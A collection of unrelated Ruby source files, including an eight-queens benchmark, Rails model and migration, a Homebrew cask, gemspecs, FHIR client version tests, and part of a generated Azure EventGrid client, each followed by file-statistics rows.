# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
class Queens < Benchmark
def initialize
@free_maxs = nil
@free_rows = nil
@free_mins = nil
@queen_rows = nil
end
def benchmark
result = true
10.times { result &&= queens }
end
def verify_result(result)
result
end
def queens
@free_rows = Array.new( 8, true)
@free_maxs = Array.new(16, true)
@free_mins = Array.new(16, true)
@queen_rows = Array.new( 8, -1)
place_queen(0)
end
def place_queen(c)
8.times do |r|
if get_row_column(r, c)
@queen_rows[r] = c
set_row_column(r, c, false)
return true if c == 7
return true if place_queen(c + 1)
set_row_column(r, c, true)
end
end
false
end
def get_row_column(r, c)
@free_rows[r] && @free_maxs[c + r] && @free_mins[c - r + 7]
end
def set_row_column(r, c, v)
@free_rows[r ] = v
@free_maxs[c + r ] = v
@free_mins[c - r + 7] = v
end
end
| 28.945946 | 79 | 0.681139 |
87b5af08aa631e84a44afe99f0089ce85cf121b7 | 212 | class Taxonomy < ActiveRecord::Base
has_many :taxons, inverse_of: :taxonomy, dependent: :destroy
has_many :classifications, inverse_of: :taxonomy, dependent: :destroy
validates :name, presence: true
end
| 23.555556 | 71 | 0.764151 |
7af450b2132a47b03817d56d863b428b0fff6b27 | 232 | class AddAssigneeToTarget < ActiveRecord::Migration[6.0]
def change
add_column :targets, :assignee_id, :integer
add_column :targets, :assignee_type, :string
add_index :targets, [:assignee_id, :assignee_type]
end
end
| 29 | 56 | 0.74569 |
08f8009ce6545d47532b1e4e19869efdf6fb949d | 431 | cask :v1 => 'radiant-player' do
version '1.3.3'
sha256 '93fe48f191c5b670704266eec8c25040d153051397420ce36cdf669a322270cf'
url "https://github.com/kbhomes/radiant-player-mac/releases/download/v#{version}/Radiant.Player.zip"
appcast 'https://github.com/kbhomes/radiant-player-mac/releases.atom'
name 'Radiant Player'
homepage 'http://kbhomes.github.io/radiant-player-mac/'
license :mit
app 'Radiant Player.app'
end
| 33.153846 | 102 | 0.763341 |
abed80c0a81ce10f8147c8eeb58fdd58b6426ea3 | 1,558 | # frozen_string_literal: true
require_relative '../test_helper'
SingleCov.covered! uncovered: 7
describe FlowdockNotification do
let(:deploy) { deploys(:succeeded_test) }
let(:notification) { FlowdockNotification.new(deploy) }
let(:endpoint) { "https://api.flowdock.com/v1/messages/team_inbox/x123yx" }
let(:chat_endpoint) { "https://api.flowdock.com/v1/messages/chat/x123yx" }
before do
deploy.stage.stubs(:flowdock_tokens).returns(["x123yx"])
FlowdockNotificationRenderer.stubs(:render).returns("foo")
end
it "sends a buddy request for all Flowdock flows configured for the stage" do
delivery = stub_request(:post, chat_endpoint)
notification.buddy_request('test message')
assert_requested delivery
end
it "notifies all Flowdock flows configured for the stage" do
delivery = stub_request(:post, endpoint)
notification.deliver
assert_requested delivery
end
it "renders a nicely formatted notification" do
stub_request(:post, endpoint)
FlowdockNotificationRenderer.stubs(:render).returns("bar")
notification.deliver
content = nil
assert_requested :post, endpoint do |request|
body = Rack::Utils.parse_query(request.body)
content = body.fetch("content")
end
content.must_equal "bar"
end
describe "#default_buddy_request_message" do
it "renders" do
message = notification.default_buddy_request_message
message.must_include ":pray: @team Super Admin is requesting approval to deploy Project **staging** to production"
end
end
end
| 29.961538 | 120 | 0.735558 |
b96d02d9fa7add5055758682ab9ddf575d192281 | 18,479 | require_relative '../test_helper'
class MultiversionTest < Test::Unit::TestCase
def test_autodetect_stu3
root = File.expand_path '..', File.dirname(File.absolute_path(__FILE__))
capabilitystatement = File.read(File.join(root, 'fixtures', 'capabilitystatement.json'))
stub_request(:get, /autodetect/).to_return(body: capabilitystatement)
client = FHIR::Client.new('autodetect')
# Intentionally set the client incorrectly
client.default_xml
client.use_r4
assert client.cached_capability_statement.nil?
assert client.detect_version == :stu3, "Expected Version to be stu3, but found #{client.detect_version.to_s}"
assert !client.cached_capability_statement.nil?, 'Expected Capability Statement to be cached'
assert client.cached_capability_statement.is_a?(FHIR::STU3::CapabilityStatement)
assert client.default_format.include? 'json'
end
def test_autodetect_dstu2
root = File.expand_path '..', File.dirname(File.absolute_path(__FILE__))
conformance = File.read(File.join(root, 'fixtures', 'conformance.json'))
stub_request(:get, /autodetect/).to_return(body: conformance)
client = FHIR::Client.new('autodetect')
# Intentionally set the client incorrectly
client.default_xml
client.use_r4
assert client.cached_capability_statement.nil?
assert client.detect_version == :dstu2, "Expected Version to be dstu2, but found #{client.detect_version.to_s}"
assert !client.cached_capability_statement.nil?, 'Expected Conformance Statement to be cached'
assert client.cached_capability_statement.is_a?(FHIR::DSTU2::Conformance)
assert client.default_format.include? 'json'
end
def test_autodetect_r4
root = File.expand_path '..', File.dirname(File.absolute_path(__FILE__))
conformance = File.read(File.join(root, 'fixtures', 'r4_capabilitystatement.json'))
stub_request(:get, /autodetect/).to_return(body: conformance)
client = FHIR::Client.new('autodetect')
# Intentionally set the client incorrectly
client.default_xml
client.use_stu3
assert client.cached_capability_statement.nil?
assert (client.detect_version == :r4), "Expected Version to be r4, but found #{client.detect_version.to_s}"
assert !client.cached_capability_statement.nil?, 'Expected Capability Statement to be cached'
assert client.cached_capability_statement.is_a?(FHIR::CapabilityStatement)
assert client.default_format.include? 'json'
end
def test_stu3_patient_manual
stub_request(:get, /stu3/).to_return(body: FHIR::STU3::Patient.new.to_json)
client = FHIR::Client.new('stu3')
client.default_json
client.use_stu3
assert_equal :stu3, client.fhir_version
assert client.read(FHIR::STU3::Patient, 'foo').resource.is_a?(FHIR::STU3::Patient)
end
def test_dstu2_patient_manual
stub_request(:get, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('dstu2')
client.default_json
client.use_dstu2
assert_equal :dstu2, client.fhir_version
assert client.read(FHIR::DSTU2::Patient, 'foo').resource.is_a?(FHIR::DSTU2::Patient)
end
def test_r4_patient_manual
stub_request(:get, /r4/).to_return(body: FHIR::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('r4')
client.default_json
client.use_r4
assert_equal :r4, client.fhir_version
assert client.read(FHIR::Patient, 'foo').resource.is_a?(FHIR::Patient)
end
def test_stu3_patient_klass_access
stub_request(:get, /stu3/).to_return(body: FHIR::STU3::Patient.new.to_json)
client = FHIR::Client.new('stu3')
client.default_json
client.use_stu3
FHIR::STU3::Model.client = client
assert FHIR::STU3::Patient.read('foo').is_a?(FHIR::STU3::Patient)
end
def test_dstu2_patient_klass_access
stub_request(:get, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('dstu2')
client.default_json
client.use_dstu2
FHIR::DSTU2::Model.client = client
assert FHIR::DSTU2::Patient.read('foo').is_a?(FHIR::DSTU2::Patient)
end
def test_r4_patient_klass_access
stub_request(:get, /r4/).to_return(body: FHIR::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('r4')
client.default_json
client.use_r4
FHIR::Model.client = client
assert FHIR::Patient.read('foo').is_a?(FHIR::Patient)
end
def test_dstu2_reply_fhir_version
stub_request(:get, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('dstu2')
client.default_json
client.use_dstu2
FHIR::DSTU2::Model.client = client
patient = FHIR::DSTU2::Patient.read('foo')
assert_equal :dstu2, client.reply.fhir_version
end
def test_stu3_reply_fhir_version
stub_request(:get, /stu3/).to_return(body: FHIR::STU3::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('stu3')
client.default_json
client.use_stu3
FHIR::STU3::Model.client = client
patient = FHIR::STU3::Patient.read('foo')
assert_equal :stu3, client.reply.fhir_version
end
def test_r4_reply_fhir_version
stub_request(:get, /r4/).to_return(body: FHIR::Patient.new({ 'id': 'foo' }).to_json)
client = FHIR::Client.new('r4')
client.default_json
client.use_r4
FHIR::Model.client = client
patient = FHIR::Patient.read('foo')
assert_equal :r4, client.reply.fhir_version
end
def test_stu3_accept_mime_type_json
stub_request(:get, /stu3/).to_return(body: FHIR::STU3::Patient.new({'id': 'foo'}).to_json)
client = FHIR::Client.new('stu3')
client.default_json
client.use_stu3
assert_equal :stu3, client.fhir_version
assert_equal 'application/fhir+json', client.read(FHIR::STU3::Patient, 'foo').request[:headers]['Accept']
end
def test_r4_accept_mime_type_json
stub_request(:get, /r4/).to_return(body: FHIR::Patient.new({'id': 'foo'}).to_json)
client = FHIR::Client.new('r4')
client.default_json
client.use_r4
assert_equal :r4, client.fhir_version
assert_equal 'application/fhir+json', client.read(FHIR::Patient, 'foo').request[:headers]['Accept']
end
def test_dstu2_accept_mime_type_json
stub_request(:get, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({'id': 'foo'}).to_json)
client = FHIR::Client.new('dstu2')
client.default_json
client.use_dstu2
assert_equal :dstu2, client.fhir_version
# dstu2 fhir type was changed in stu3
assert_equal 'application/json+fhir', client.read(FHIR::DSTU2::Patient, 'foo').request[:headers]['Accept']
end
def test_stu3_content_type_mime_type_json
stub_request(:post, /stu3/).to_return(body: FHIR::STU3::Patient.new({'id': 'foo'}).to_json)
client = FHIR::Client.new('stu3')
client.default_json
client.use_stu3
assert_equal :stu3, client.fhir_version
assert client.create(FHIR::STU3::Patient.new({'id': 'foo'})).request[:headers]['Content-Type'].include?('application/fhir+json')
end
def test_dstu2_content_type_mime_type_json
stub_request(:post, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({'id': 'foo'}).to_json)
client = FHIR::Client.new('dstu2')
client.default_json
client.use_dstu2
assert_equal :dstu2, client.fhir_version
# dstu2 fhir type was changed in stu3
assert client.create(FHIR::DSTU2::Patient.new({'id': 'foo'})).request[:headers]['Content-Type'].include?('application/json+fhir')
end
def test_r4_content_type_mime_type_json
stub_request(:post, /r4/).to_return(body: FHIR::Patient.new({'id': 'foo'}).to_json)
client = FHIR::Client.new('r4')
client.default_json
client.use_r4
assert_equal :r4, client.fhir_version
assert client.create(FHIR::Patient.new({'id': 'foo'})).request[:headers]['Content-Type'].include?('application/fhir+json')
end
def test_stu3_accept_mime_type_xml
stub_request(:get, /stu3/).to_return(body: FHIR::STU3::Patient.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('stu3')
client.default_xml
client.use_stu3
assert_equal :stu3, client.fhir_version
assert_equal 'application/fhir+xml', client.read(FHIR::STU3::Patient, 'foo').request[:headers]['Accept']
end
def test_dstu2_accept_mime_type_xml
stub_request(:get, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('dstu2')
client.default_xml
client.use_dstu2
assert_equal :dstu2, client.fhir_version
# dstu2 fhir type was changed in stu3
assert_equal 'application/xml+fhir', client.read(FHIR::DSTU2::Patient, 'foo').request[:headers]['Accept']
end
def test_r4_accept_mime_type_xml
stub_request(:get, /r4/).to_return(body: FHIR::Patient.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('r4')
client.default_xml
client.use_r4
assert_equal :r4, client.fhir_version
# dstu2 fhir type was changed in stu3
assert_equal 'application/fhir+xml', client.read(FHIR::Patient, 'foo').request[:headers]['Accept']
end
def test_stu3_content_type_mime_type_xml
stub_request(:post, /stu3/).to_return(body: FHIR::STU3::Patient.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('stu3')
client.default_xml
client.use_stu3
assert_equal :stu3, client.fhir_version
assert client.create(FHIR::STU3::Patient.new({'id': 'foo'})).request[:headers]['Content-Type'].include?('application/fhir+xml')
end
def test_r4_content_type_mime_type_xml
stub_request(:post, /r4/).to_return(body: FHIR::Patient.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('r4')
client.default_xml
client.use_r4
assert_equal :r4, client.fhir_version
assert client.create(FHIR::Patient.new({'id': 'foo'})).request[:headers]['Content-Type'].include?('application/fhir+xml')
end
def test_dstu2_content_type_mime_type_xml
stub_request(:post, /dstu2/).to_return(body: FHIR::DSTU2::Patient.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('dstu2')
client.default_xml
client.use_dstu2
assert_equal :dstu2, client.fhir_version
# dstu2 fhir type was changed in stu3
assert client.create(FHIR::DSTU2::Patient.new({'id': 'foo'})).request[:headers]['Content-Type'].include?('application/xml+fhir')
end
def test_dstu2_transaction
stub_request(:post, /dstu2/).to_return(body: FHIR::DSTU2::Bundle.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('dstu2')
client.default_xml
client.use_dstu2
client.begin_transaction
client.add_transaction_request('GET', 'Patient/foo')
client.add_transaction_request('POST', nil, FHIR::DSTU2::Observation.new({'id': 'foo'}))
reply = client.end_transaction
assert_equal :dstu2, reply.fhir_version
assert_equal 'application/xml+fhir', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::DSTU2::Bundle)
end
def test_stu3_transaction
stub_request(:post, /stu3/).to_return(body: FHIR::STU3::Bundle.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('stu3')
client.default_xml
client.use_stu3
client.begin_transaction
client.add_transaction_request('GET', 'Patient/foo')
client.add_transaction_request('POST', nil, FHIR::STU3::Observation.new({'id': 'foo'}))
reply = client.end_transaction
assert_equal :stu3, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::STU3::Bundle)
end
def test_r4_transaction
stub_request(:post, /r4/).to_return(body: FHIR::Bundle.new({'id': 'foo'}).to_xml)
client = FHIR::Client.new('r4')
client.default_xml
client.use_r4
client.begin_transaction
client.add_transaction_request('GET', 'Patient/foo')
client.add_transaction_request('POST', nil, FHIR::Observation.new({'id': 'foo'}))
reply = client.end_transaction
assert_equal :r4, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::Bundle)
end
def test_dstu2_patient_record
bundle = FHIR::DSTU2::Bundle.new({'id': 'foo'})
bundle.entry << FHIR::DSTU2::Bundle::Entry.new
bundle.entry.last.resource = FHIR::DSTU2::Patient.new({'id': 'example-patient'})
stub_request(:get, 'http://dstu2/Patient/example-patient/$everything').to_return(body: bundle.to_xml)
client = FHIR::Client.new('dstu2')
client.default_xml
client.use_dstu2
reply = client.fetch_patient_record('example-patient')
assert_equal :dstu2, reply.fhir_version
assert_equal 'application/xml+fhir', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::DSTU2::Bundle)
assert reply.resource.entry.last.resource.is_a?(FHIR::DSTU2::Patient)
end
def test_stu3_patient_record
bundle = FHIR::STU3::Bundle.new({'id': 'foo'})
bundle.entry << FHIR::STU3::Bundle::Entry.new
bundle.entry.last.resource = FHIR::STU3::Patient.new({'id': 'example-patient'})
stub_request(:get, 'http://stu3/Patient/example-patient/$everything').to_return(body: bundle.to_xml)
client = FHIR::Client.new('stu3')
client.default_xml
client.use_stu3
reply = client.fetch_patient_record('example-patient')
assert_equal :stu3, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::STU3::Bundle)
assert reply.resource.entry.last.resource.is_a?(FHIR::STU3::Patient)
end
def test_r4_patient_record
bundle = FHIR::Bundle.new({'id': 'foo'})
bundle.entry << FHIR::Bundle::Entry.new
bundle.entry.last.resource = FHIR::Patient.new({'id': 'example-patient'})
stub_request(:get, 'http://r4/Patient/example-patient/$everything').to_return(body: bundle.to_xml)
client = FHIR::Client.new('r4')
client.default_xml
client.use_r4
reply = client.fetch_patient_record('example-patient')
assert_equal :r4, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::Bundle)
assert reply.resource.entry.last.resource.is_a?(FHIR::Patient)
end
def test_dstu2_encounter_record
bundle = FHIR::DSTU2::Bundle.new({'id': 'foo'})
bundle.entry << FHIR::DSTU2::Bundle::Entry.new
bundle.entry.last.resource = FHIR::DSTU2::Encounter.new({'id': 'example-encounter'})
stub_request(:get, 'http://dstu2/Encounter/example-encounter/$everything').to_return(body: bundle.to_xml)
client = FHIR::Client.new('dstu2')
client.default_xml
client.use_dstu2
reply = client.fetch_encounter_record('example-encounter')
assert_equal :dstu2, reply.fhir_version
assert_equal 'application/xml+fhir', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::DSTU2::Bundle)
assert reply.resource.entry.last.resource.is_a?(FHIR::DSTU2::Encounter)
end
def test_stu3_encounter_record
bundle = FHIR::STU3::Bundle.new({'id': 'foo'})
bundle.entry << FHIR::STU3::Bundle::Entry.new
bundle.entry.last.resource = FHIR::STU3::Encounter.new({'id': 'example-encounter'})
stub_request(:get, 'http://stu3/Encounter/example-encounter/$everything').to_return(body: bundle.to_xml)
client = FHIR::Client.new('stu3')
client.default_xml
client.use_stu3
reply = client.fetch_encounter_record('example-encounter')
assert_equal :stu3, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::STU3::Bundle)
assert reply.resource.entry.last.resource.is_a?(FHIR::STU3::Encounter)
end
def test_r4_encounter_record
bundle = FHIR::Bundle.new({'id': 'foo'})
bundle.entry << FHIR::Bundle::Entry.new
bundle.entry.last.resource = FHIR::Encounter.new({'id': 'example-encounter'})
stub_request(:get, 'http://r4/Encounter/example-encounter/$everything').to_return(body: bundle.to_xml)
client = FHIR::Client.new('r4')
client.default_xml
client.use_r4
reply = client.fetch_encounter_record('example-encounter')
assert_equal :r4, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::Bundle)
assert reply.resource.entry.last.resource.is_a?(FHIR::Encounter)
end
def test_dstu2_terminology_valueset_lookup
stub_request(:post, /dstu2/).to_return(body: FHIR::DSTU2::Parameters.new({'id': 'results'}).to_xml)
client = FHIR::Client.new('dstu2')
client.default_xml
client.use_dstu2
options = {
:operation => {
:method => :get,
:parameters => {
'code' => { type: 'Code', value: 'chol-mmol' },
'system' => { type: 'Uri', value: 'http://hl7.org/fhir/CodeSystem/example-crucible' }
}
}
}
reply = client.code_system_lookup(options)
assert_equal :dstu2, reply.fhir_version
assert_equal 'application/xml+fhir', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::DSTU2::Parameters)
end
def test_stu3_terminology_code_system_lookup
stub_request(:post, /stu3/).to_return(body: FHIR::STU3::Parameters.new({'id': 'results'}).to_xml)
client = FHIR::Client.new('stu3')
client.default_xml
client.use_stu3
options = {
:operation => {
:method => :get,
:parameters => {
'code' => { type: 'Code', value: 'chol-mmol' },
'system' => { type: 'Uri', value: 'http://hl7.org/fhir/CodeSystem/example-crucible' }
}
}
}
reply = client.code_system_lookup(options)
assert_equal :stu3, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::STU3::Parameters)
end
def test_r4_terminology_code_system_lookup
stub_request(:post, /r4/).to_return(body: FHIR::Parameters.new({'id': 'results'}).to_xml)
client = FHIR::Client.new('r4')
client.default_xml
client.use_r4
options = {
:operation => {
:method => :get,
:parameters => {
'code' => { type: 'Code', value: 'chol-mmol' },
'system' => { type: 'Uri', value: 'http://hl7.org/fhir/CodeSystem/example-crucible' }
}
}
}
reply = client.code_system_lookup(options)
assert_equal :r4, reply.fhir_version
assert_equal 'application/fhir+xml', reply.request[:headers]['Accept']
assert reply.resource.is_a?(FHIR::Parameters)
end
end
| 41.713318 | 133 | 0.702203 |
6aac3aff8c67c9f121bc77dd41765d52bb55aa5e | 1,741 | # frozen_string_literal: true
lib = File.expand_path('../lib', __dir__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require_relative 'config/config'
Gem::Specification.new do |spec|
spec.name = 'facter-ng'
spec.version = FACTER_VERSION
spec.authors = ['Bogdan Irimie']
spec.email = ['[email protected]']
spec.summary = 'New version of Facter'
spec.description = 'New version of Facter'
# spec.homepage = " Put your gem's website or public repo URL here."
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
else
raise 'RubyGems 2.0 or newer is required to protect against ' \
'public gem pushes.'
end
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = `git ls-files`.split("\n").select { |file_name| file_name.match('^((?!spec).)*$') }
spec.bindir = 'bin'
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_development_dependency 'coveralls', '~> 0.8.23'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec', '~> 3.0'
spec.add_development_dependency 'rubocop', '~> 0.74.0'
spec.add_development_dependency 'rubycritic', '~> 4.1.0'
spec.add_runtime_dependency 'bundler', '~> 2.0'
spec.add_runtime_dependency 'hocon', '1.3.0'
spec.add_runtime_dependency 'sys-filesystem', '~> 1.3'
spec.add_runtime_dependency 'thor', '~> 1.0.1'
end
| 38.688889 | 98 | 0.686387 |
5df51091f58578b8faa00d650c645b65d146be2a | 1,119 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'cocoapods-rocket/gem_version.rb'
Gem::Specification.new do |spec|
spec.name = 'cocoapods-rocket'
spec.version = CocoapodsRocket::VERSION
spec.authors = ['asynclog']
spec.email = ['[email protected]']
spec.description = %q{A short description of cocoapods-rocket.}
spec.summary = %q{A longer description of cocoapods-rocket.}
spec.homepage = 'https://github.com/EXAMPLE/cocoapods-rocket'
spec.license = 'MIT'
spec.files = `git ls-files`.split($/)
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ['lib']
spec.add_development_dependency 'bundler'
spec.add_development_dependency 'rake'
spec.add_development_dependency "rspec"
spec.add_runtime_dependency 'colored2'
spec.add_runtime_dependency 'fileutils'
spec.add_runtime_dependency 'json'
spec.add_runtime_dependency 'version_bumper'
end
| 36.096774 | 74 | 0.698838 |
0360737e2f51fdcb040ce23d7028b2076007b9ec | 742 | module Barometer
module Query
module Service
class GoogleGeocode
class Api < Utils::Api
def url
'http://maps.googleapis.com/maps/api/geocode/json'
end
def params
format_params
end
def unwrap_nodes
['results', 0]
end
private
def format_params
params = { sensor: 'false' }
params[:region] = query.geo.country_code if query.geo.country_code
if query.format == :coordinates
params[:latlng] = query.q.dup
else
params[:address] = query.q.dup
end
params
end
end
end
end
end
end
| 20.611111 | 78 | 0.490566 |
b9c6e6238fef2105605ee412b7b10075fa19906a | 20,688 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::EventGrid::Mgmt::V2020_06_01
#
# Azure EventGrid Management Client
#
class PrivateLinkResources
include MsRestAzure
#
# Creates and initializes a new instance of the PrivateLinkResources class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [EventGridManagementClient] reference to the EventGridManagementClient
attr_reader :client
#
# Get a private link resource.
#
# Get properties of a private link resource.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
# @param parent_name [String] The name of the parent resource (namely, either,
# the topic name or domain name).
# @param private_link_resource_name [String] The name of private link resource.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [PrivateLinkResource] operation results.
#
def get(resource_group_name, parent_type, parent_name, private_link_resource_name, custom_headers:nil)
response = get_async(resource_group_name, parent_type, parent_name, private_link_resource_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Get a private link resource.
#
# Get properties of a private link resource.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
# @param parent_name [String] The name of the parent resource (namely, either,
# the topic name or domain name).
# @param private_link_resource_name [String] The name of private link resource.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_with_http_info(resource_group_name, parent_type, parent_name, private_link_resource_name, custom_headers:nil)
get_async(resource_group_name, parent_type, parent_name, private_link_resource_name, custom_headers:custom_headers).value!
end
#
# Get a private link resource.
#
# Get properties of a private link resource.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
# @param parent_name [String] The name of the parent resource (namely, either,
# the topic name or domain name).
# @param private_link_resource_name [String] The name of private link resource.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_async(resource_group_name, parent_type, parent_name, private_link_resource_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, 'parent_type is nil' if parent_type.nil?
fail ArgumentError, 'parent_name is nil' if parent_name.nil?
fail ArgumentError, 'private_link_resource_name is nil' if private_link_resource_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/{parentType}/{parentName}/privateLinkResources/{privateLinkResourceName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'parentType' => parent_type,'parentName' => parent_name,'privateLinkResourceName' => private_link_resource_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::EventGrid::Mgmt::V2020_06_01::Models::PrivateLinkResource.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
# @param parent_name [String] The name of the parent resource (namely, either,
# the topic name or domain name).
# @param filter [String] The query used to filter the search results using
# OData syntax. Filtering is permitted on the 'name' property only and with
# limited number of OData operations. These operations are: the 'contains'
# function as well as the following logical operations: not, and, or, eq (for
# equal), and ne (for not equal). No arithmetic operations are supported. The
# following is a valid filter example: $filter=contains(namE, 'PATTERN') and
# name ne 'PATTERN-1'. The following is not a valid filter example:
# $filter=location eq 'westus'.
# @param top [Integer] The number of results to return per page for the list
# operation. Valid range for top parameter is 1 to 100. If not specified, the
# default number of results to be returned is 20 items per page.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<PrivateLinkResource>] operation results.
#
def list_by_resource(resource_group_name, parent_type, parent_name, filter:nil, top:nil, custom_headers:nil)
first_page = list_by_resource_as_lazy(resource_group_name, parent_type, parent_name, filter:filter, top:top, custom_headers:custom_headers)
first_page.get_all_items
end
#
# List private link resources under specific topic or domain.
#
# List all the private link resources under a topic or domain.
#
# @param resource_group_name [String] The name of the resource group within the
# user's subscription.
# @param parent_type [String] The type of the parent resource. This can be
# either \'topics\' or \'domains\'.
# @param parent_name [String] The name of the parent resource (namely, either,
# the topic name or domain name).
# @param filter [String] The query used to filter the search results using
# OData syntax. Filtering is permitted on the 'name' property only and with
# limited number of OData operations. These operations are: the 'contains'
# function as well as the following logical operations: not, and, or, eq (for
# equal), and ne (for not equal). No arithmetic operations are supported. The
# following is a valid filter example: $filter=contains(namE, 'PATTERN') and
# name ne 'PATTERN-1'. The following is not a valid filter example:
# $filter=location eq 'westus'.
# @param top [Integer] The number of results to return per page for the list
# operation. Valid range for top parameter is 1 to 100. If not specified, the
# default number of results to be returned is 20 items per page.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
